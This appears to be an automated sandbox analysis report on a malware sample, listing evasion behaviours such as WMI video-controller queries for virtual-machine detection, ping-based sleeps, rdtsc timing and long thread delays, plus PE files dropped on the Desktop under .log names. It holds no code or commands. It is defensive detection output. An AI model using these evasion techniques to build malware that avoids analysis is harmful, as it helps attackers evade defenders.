Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\RuntimeDll\cef_process.exe	Memory allocated: 17D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Memory allocated: 1B230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Memory allocated: 1550000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Memory allocated: 1B090000 memory reserve \| memory write watch

Source: C:\RuntimeDll\cef_process.exe

Code function: 8_2_00007FFAAC7436FA rdtsc

8_2_00007FFAAC7436FA

Source: C:\RuntimeDll\cef_process.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3282	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3614	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2881
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3129

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zLeRKKNH.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jWRUMqoc.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iesEpfvs.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YztwqAnw.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CtGsekUC.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\owqLTDnh.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ORagGYiO.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ykSQugis.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MOnylpdT.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cmPeMAqD.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rAZKvkEJ.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WkOFzhSS.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zPzZvHLt.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uqHSBmkN.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lYDDhZsX.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FelIlyfv.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iqbcNzlc.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PqvOIQVP.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wjWAnjWL.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YmBoVQXN.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WtmFjUlP.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zlIjJSaG.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UdNNkMkD.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KMBPPFZY.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GWKYIJYf.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZVuWGvdL.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DJEawqoG.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vZJioLKA.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tFkkvTtJ.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CfUiBMYm.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Yimecftu.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZfOmxfIp.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hiNMadse.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jJYMqGYt.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pPutoWtQ.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UicXeyNX.log	Jump to dropped file
